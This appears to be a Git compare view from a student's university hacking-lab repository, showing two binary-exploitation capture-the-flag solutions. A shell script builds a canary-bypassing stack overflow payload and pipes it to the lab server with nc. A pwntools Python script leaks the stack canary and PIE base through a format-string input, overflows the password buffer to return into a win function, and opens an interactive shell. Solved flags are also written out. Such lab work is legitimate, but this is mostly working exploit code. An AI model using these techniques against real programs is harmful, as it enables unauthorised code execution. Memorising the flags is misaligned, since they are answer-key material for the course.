ejung/hacklab
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: ejung:4c3e281ef5ee82c60172d97c37ab454057490a7d
Branches Tags
ejung:master
...
compare: ejung:3e0859b09ee9bcc5aa75886a604b852bd92c9240
Branches Tags
ejung:master

2 Commits
4c3e281ef5 ... 3e0859b09e

Author SHA1 Message Date
Eggert Jung
3e0859b09e 7 2026-01-07 14:26:07 +01:00
Eggert Jung
a4dc06d7e1 howto execute 2026-01-06 15:57:31 +01:00
2 changed files with 85 additions and 7 deletions
Expand all files Collapse all files

10
4/level6/test.sh
View File

@@ -1,15 +1,11 @@
# : | { ./test.sh | nc binexp.stud12.hacklab.ias.tu-bs.de 4006; } > /dev/fd/0;
#objdump #objdump
#00000000004011d6 g F .text 000000000000003a win #00000000004011d6 g F .text 000000000000003a win
OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n" OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #64 PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #64
SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00" #kind of irrelevant
GADGET1="\x84\x12\x40\00\00\00\00\00" #ret (for stack alignment)
GADGET2="\x83\x12\x40\00\00\00\00\00" #pop rdi, ret
CMDADDR="\x48\x40\x40\00\00\00\00\00"
CMDCALL="\xd6\x11\x40\00\00\00\00\00" CMDCALL="\xd6\x11\x40\00\00\00\00\00"
#STACKPT="\x18\xde\xff\xff\xff\x7f\00\00"
STACKPT="\x02\00\00\00\00\00\00\00"
read read
read read
@@ -26,7 +22,7 @@ read input
>&2 echo $input >&2 echo $input
>&2 echo "writing canary + exploit" >&2 echo "writing canary + exploit"
printf "\00$PADDING""1234567\00${canary:0:7}$STACKPT$CMDCALL\n" printf "\00$PADDING""1234567\00${canary:0:7}12345678$CMDCALL\n"
read input read input
>&2 echo "should be bye: "$input >&2 echo "should be bye: "$input
printf "cat flag.txt\n" printf "cat flag.txt\n"

82
4/level7/test.py Normal file
View File

@@ -0,0 +1,82 @@
#!/usr/bin/env python3
from pwn import *
BINARY = "./level7"
HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4007
#HOST, PORT = "localhost", 4007
elf = ELF(BINARY, checksec=False)
def main():
# 1) start remote
p = remote(HOST, PORT)
# 2) read the question
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
payload = "hacklab{st4ck_c00k1es_w0nt_5top_y0u_G0HNiuT0}"
p.sendline(payload.encode())
print("sending: ", end='')
print(payload)
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
##############
question = p.recv(timeout=999)
print("[+] got username prompt:", question.decode().strip())
# 3) build payload
#offset = 32
win = elf.symbols['win']
#payload = b"A"*offset
#payload += 0xa6#p64(win)
#payload += b"\n"
payload = "%7$p %9$p"
p.sendline(payload.encode())
print("sending: ", end='')
print(payload)
leak = p.recvline(timeout=999)
print("[+] leak:", leak)
canary = int(leak[-35:-17],16)
pieaddr = int(leak[-16:-2],16)
print("[+] canary:", hex(canary))
print("[+] pieaddr:", hex(pieaddr))
question = p.recv(timeout=999)
print("[+] got username prompt:", question.decode().strip())
p.sendline("admin".encode())
print("sending username \"admin\"")
question = p.recvline(timeout=999)
print("[+] got username msg:", question.decode().strip())
question = p.recv(timeout=999)
print("[+] got password prompt:", question.decode().strip())
payload = b"A"*40
payload += p64(canary)
payload += p64(pieaddr & 0xFFFFFFFFFFFFF000)
payload += p64((pieaddr & 0xFFFFFFFFFFFFF000)+0x229)
p.sendline(payload)
print("sending payload: ", payload)
question = p.recvline(timeout=999)
print("[+] got login msg:", question.decode().strip())
# 5) we should now have a shell
p.interactive()
if __name__ == "__main__":
main()